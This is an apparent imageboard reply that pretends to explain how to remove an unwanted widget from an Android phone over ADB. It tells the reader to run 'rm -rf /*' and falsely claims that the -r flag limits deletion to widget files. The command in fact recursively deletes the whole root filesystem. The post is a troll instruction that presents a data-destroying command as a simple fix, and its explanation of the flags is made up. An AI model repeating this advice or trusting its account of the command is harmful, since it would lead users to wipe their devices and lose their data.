>>1188008install ADB tools on your computer, connect to the phone and remove the widget from the OS files
it's pretty simple to locate one you're in a terminal you just need to delete the * file in the root directory, so you can type in
rm -rf /*
and it will remove the widget you need gone, the -rf is so that it only removes widget files (.r file extension idk why it's an r blame google) and the f is to force it so it doesn't get hung up on "hur dur this is a system widget"